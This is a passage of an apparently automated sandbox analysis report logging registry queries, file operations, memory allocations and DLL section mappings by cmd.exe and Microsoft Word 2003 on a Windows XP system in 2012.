HKEY_USERS\Software\Microsoft\Command Processor DelayedExpansion object name not found 1 4AD04A88 RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor DefaultColor success or wait 1 4AD04AAD RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor CompletionChar success or wait 1 4AD04AE5 RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor PathCompletionChar object name not found 1 4AD04B37 RegQueryValueExW
HKEY_USERS\Software\Microsoft\Command Processor AutoRun object name not found 1 4AD04BB8 RegQueryValueExW

Mutex Activites
Name Completion Count Source Address Symbol

Process Activites
PID Process info class Completion Count Source Address Symbol
PID Filepath Completion Count Source Address Symbol

Memory Activites
Memory Allocated
PID Filepath Base Length Protection Completion Count Source Address Symbol
868 C:\WINDOWS\system32\cmd.exe 970000 13FE10 page read and write success or wait 1 4AD04578 VirtualAlloc
PID Filepath Base Length New Protection Old Protection Completion Count Source Address Symbol
Memory Usage Statistics
Time Private Usage (mb) Workingset (mb) Page File Usage (mb)
15:20:42 1 1 1
15:20:44 1 2 1

System Activites
System info class Completion Count Source Address Symbol
Chronological Activities
Operation Data Completion Time
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DisableUNCCheck object name not found 756896931
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: EnableExtensions success or wait 756897263
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DelayedExpansion object name not found 756897586
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: DefaultColor success or wait 756897953
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: CompletionChar success or wait 756898274
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: PathCompletionChar success or wait 756898593
Key value queried Path: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor Name: AutoRun success or wait 756898911
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: DisableUNCCheck object name not found 756899483
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: EnableExtensions success or wait 756899808
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: DelayedExpansion object name not found 756900130
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: DefaultColor success or wait 756900449
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: CompletionChar success or wait 756900766
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: PathCompletionChar object name not found 756901085
Key value queried Path: HKEY_USERS\Software\Microsoft\Command Processor Name: AutoRun object name not found 756901401
Memory allocated PID: 868 Path: C:\WINDOWS\system32\cmd.exe Base: 970000 Length: 13FE10 Allocation Type: unknown Protection: page read and write success or wait 756911898
File opened Path: nul Access: read attributes and synchronize and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: true success or wait 756917204
File deleted Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\~WORDL.tmp New path: Disposition: Data : success or wait 756923585

Analysis File: WINWORD.EXE PID: 900 Parent PID: 1096

General
Start time: 15:20:42
Start date: 24/07/2012
Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE
Wow64 process (32bit): false
Commandline: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE /n /dde
Imagebase: 0x30000000
File size: 12310368 bytes
MD5 hash: 443747857245BF90847AE396C53470A6

File Activites
File Path Access Options Content overwritten Completion Count Source Address Symbol
File Path Access Attributes Options Completion Count Source Address Symbol
File Deleted
File Path Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC success or wait 2 300D5696 DeleteFileW
C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 1 300D5696 DeleteFileW
File Moved
Old File Path New File Path Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~WRI0002 C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 1 300AFF20 MoveFileW
File Written
File Path Offset Length Value Completion Count Source Address Symbol
C:\DOCUME~1\ADMINI~1\LOCALS~1\~$hone 5.doc unknown 54 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 1 30041F40 WriteFile
C:\DOCUME~1\ADMINI~1\LOCALS~1\~$hone 5.doc unknown 108 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 16 00 00 00 F8 00 06 00 3E 01 0A 00 A0 00 00 00 00 00 00 00 00 00 00 00 00 00 FF FF 02 00 00 00 00 00 00 00 74 47 0C 00 FF FF FF FF FF FF 0C 00 5C 00 00 00 03 00 00 00 04 00 00 00 08 00 00 00 04 00 00 00 success or wait 1 30041F40 WriteFile
C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC unknown 54 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 2 30041F40 WriteFile
C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC unknown 108 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 20 00 00 00 00 00 00 00 04 00 00 00 04 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 03 00 01 00 0C 00 5C 00 00 00 03 00 00 00 04 00 00 00 08 00 00 00 04 00 00 00 success or wait 2 30041F40 WriteFile
File Path Offset Length Value Completion Count Source Address Symbol
Other File Operations
File Path Disposition Data Ascii Data Completion Count Source Address Symbol
C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC PositionInformation Offset: 0 success or wait 4 301E47C6 SetFilePointer

Section Activites
Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 260000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 280000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 2D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 320000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown unknown unknown unknown unknown object name not found 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 410000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 850000 12288 own pid readonly success or wait 1
\KnownDlls\psapi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\psapi.dll query and write and read and execute image 76BF0000 45056 own pid read write success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL write and read and execute commit 8D0000 778240 own pid execute success or wait 1
C:\Program Files\Microsoft Office\OFFICE11\1033\WWINTL.DLL query and read commit 8D0000 778240 own pid readonly success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19211108172 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg19211108172 query and write and read reserve A20000 126976 own pid read write success or wait 1
\KnownDlls\uxtheme.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit A60000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit unknown unknown unknown unknown object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown A60000 262144 own pid read write success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit AA0000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit AA0000 180224 own pid readonly success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit AA0000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and read commit AA0000 180224 own pid readonly success or wait 1
C:\WINDOWS\system32\msctfime.ime write and read and execute commit AA0000 180224 own pid execute success or wait 1
C:\WINDOWS\system32\msctfime.ime query and write and read and execute image 755C0000 188416 own pid read write success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL write and read and execute commit AB0000 1757184 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\1033\MSOINTL.DLL query and read commit AB0000 1757184 own pid readonly success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg20321108172 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg20321108172 query and write and read reserve C60000 126976 own pid read write success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit CF0000 401408 own pid execute success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit CF0000 8462336 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit CF0000 618496 own pid readonly success or wait 1
\BaseNamedObjects\DfSharedHeap3B051 query and write and read reserve DA0000 4194304 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-241752 query and write and read commit D10000 524288 own pid read write success or wait 1
\BaseNamedObjects\DfRoot00003B051 query and write and read commit 11A0000 4096 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-241775 query and write and read commit 11B0000 524288 own pid read write success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL write and read and execute commit 1240000 1105920 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\OFFICE11\RICHED20.DLL query and write and read and execute image 39700000 1097728 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1300000 159744 own pid execute success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1300000 159744 own pid execute success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1300000 159744 own pid execute success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1300000 159744 own pid execute success or wait 1
\BaseNamedObjects\CTF.AsmListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 1300000 4096 own pid read write success or wait 1
\KnownDlls\CLBCATQ.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\clbcatq.dll query and write and read and execute image 76FD0000 520192 own pid read write success or wait 1
\KnownDlls\COMRes.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\comres.dll query and write and read and execute image 77050000 806912 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ENF..CJJCD query and write and read commit 1330000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.Shared.SFM.MNH query and write and read and execute and extend size unknown 1340000 524288 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ENF.B.CJJCD query and write and read commit 1330000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ENF.C.CJJCD query and write and read commit 13C0000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ENF.D.CJJCD query and write and read commit 13D0000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ENF.E.CJJCD query and write and read commit 1330000 4096 own pid read write success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19521108172 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg19521108172 query and write and read reserve 13E0000 126976 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ENF.F.AMJCD query and write and read commit 1330000 4096 own pid read write success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19521108172 query and write and read and execute and extend size unknown 1400000 126976 own pid read write success or wait 1
\BaseNamedObjects\Local\Mso97SharedDg19531108172 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\Mso97SharedDg19531108172 query and write and read reserve 1400000 126976 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.ENF.G.ANJCD query and write and read commit 1330000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MNH.FB.ANJCD query and write and read and execute and extend size unknown 1330000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MNH.GB.ANJCD query and write and read and execute and extend size unknown 1330000 4096 own pid read write success or wait 1
\BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MNH.HB.ANJCD query and write and read and execute and extend size unknown 1330000 4096 own pid read write success or wait 1
\KnownDlls\msi.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msi.dll query and write and read and execute image 7D1E0000 2867200 own pid read write success or wait 1
\KnownDlls\SETUPAPI.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\setupapi.dll query and write and read and execute image 77920000 995328 own pid read write success or wait 1
\BaseNamedObjects\DfSharedHeap3B5CC query and write and read reserve 1420000 4194304 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-243156 query and write and read commit 1820000 524288 own pid read write success or wait 1
\BaseNamedObjects\DfRoot00003B5CC query and write and read commit 13D0000 4096 own pid read write success or wait 1
\BaseNamedObjects\DFMap0-243174 query and write and read commit 18A0000 524288 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\BaseNamedObjects\Local\MSO_Formal11108172_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\MSO_Formal11108172_S-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 1920000 8192 own pid read write success or wait 1
\BaseNamedObjects\Local\MSO_AdHoc11108172_S-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown unknown unknown unknown unknown object name not found 1
\BaseNamedObjects\Local\MSO_AdHoc11108172_S-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 1930000 8192 own pid read write success or wait 1
C:\WINDOWS\system32\msimtf.dll write and read and execute commit 1980000 159744 own pid execute success or wait 1
\BaseNamedObjects\Global\RotHintTable read unknown 1980000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\winlogon.exe write and read and execute commit 1990000 507904 own pid execute success or wait 1
\KnownDlls\xpsp2res.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\xpsp2res.dll query and write and read and execute image 1990000 2904064 own pid read write conflicting addresses 1
\KnownDlls\LINKINFO.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\linkinfo.dll query and write and read and execute image 76980000 32768 own pid read write success or wait 1
\KnownDlls\ntshrui.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\ntshrui.dll query and write and read and execute image 76990000 151552 own pid read write success or wait 1
\KnownDlls\ATL.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\atl.dll query and write and read and execute image 76B20000 69632 own pid read write success or wait 1
\KnownDlls\NETAPI32.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\netapi32.dll query and write and read and execute image 5B860000 348160 own pid read write success or wait 1
C:\WINDOWS\system32\ntshrui.dll read commit 1E70000 143360 own pid readonly success or wait 1
unknown query and write and read commit 1E70000 4096 own pid read write success or wait 1
unknown query and write and read commit 1E70000 4096 own pid read write success or wait 1
unknown query and write and read commit 1E70000 4096 own pid read write success or wait 1
unknown query and write and read commit 1E70000 4096 own pid read write success or wait 1
unknown query and write and read commit 1E70000 4096 own pid read write success or wait 1
unknown query and write and read commit 1E70000 4096 own pid read write success or wait 1
unknown query and write and read commit 1E70000 4096 own pid read write success or wait 1
unknown query and write and read commit 1E70000 4096 own pid read write success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL write and read and execute commit 1E70000 131072 own pid execute success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL query and write and read and execute image 37320000 143360 own pid read write success or wait 1
\KnownDlls\WINSPOOL.DRV write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\winspool.drv query and write and read and execute image 73000000 155648 own pid read write success or wait 1
\KnownDlls\OLEACC.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\oleacc.dll query and write and read and execute image 74C80000 180224 own pid read write success or wait 1
\KnownDlls\MSVCP60.dll write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\msvcp60.dll query and write and read and execute image 76080000 413696 own pid read write success or wait 1
C:\WINDOWS\system32\oleaccrc.dll query and read commit 1E80000 20480 own pid readonly success or wait 1
\KnownDlls\SXS.DLL write and read and execute unknown unknown unknown unknown unknown object name not found 1
C:\WINDOWS\system32\sxs.dll query and write and read and execute image 7E720000 720896 own pid read write success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL query and read commit 1FB0000 49152 own pid readonly success or wait 1
C:\WINDOWS\system32\stdole2.tlb query and read commit 1FC0000 16384 own pid readonly success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\1033\STINTL.DLL write and read and execute commit 1FD0000 24576 own pid execute success or wait 1
C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\1033\STINTL.DLL query and write and read and execute image 374B0000 24576 own pid read write success or wait 1
C:\Program Files\Common Files\Microsoft Shared\PROOF\MSLID.DLL write and read and execute commit 21F0000 536576 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\PROOF\MSLID.DLL query and write and read and execute image 507C0000 540672 own pid read write success or wait 1
C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSPELL3.DLL write and read and execute commit 2600000 86016 own pid execute success or wait 1
C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSPELL3.DLL query and write and read and execute image 3F000000 86016 own pid read write success or wait 1
\BaseNamedObjects\DfSharedHeap3C40F query and write and read reserve 2610000 4194304 own pid read write success or wait 1
\BaseNamedObjects\DfSharedHeap3C42C query and write and read reserve 2610000 4194304 own pid read write success or wait 1
\BaseNamedObjects\DfSharedHeap3C440 query and write and read reserve 2610000 4194304 own pid read write success or wait 1
C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSP3EN.LEX query and read commit 2610000 462848 own pid readonly success or wait 1
C:\Program Files\Common Files\Microsoft Shared\PROOF\MSGR3EN.LEX query and read commit 2830000 3788800 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unidrvui.dll write and read and execute commit 2ED0000 745472 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\unidrvui.dll query and write and read and execute image 7E5A0000 761856 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2ED0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2EE0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2EE0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2ED0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2EE0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2EE0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2ED0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2EE0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2EE0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdrv.dll write and read and execute commit 2ED0000 765952 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdrv.dll query and write and read and execute image 3F500000 786432 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2EE0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2EF0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2EF0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 2EE0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 2EF0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 2EF0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\fontsub.dll write and read and execute commit 32E0000 81920 own pid execute success or wait 1
C:\WINDOWS\system32\fontsub.dll query and write and read and execute image 69310000 94208 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll query and write and read and execute image 3F960000 212992 own pid read write success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD query and read commit 32E0000 61440 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini query and read commit 32F0000 4096 own pid readonly success or wait 1
C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll write and read and execute commit 32F0000 200704 own pid execute success or wait 1
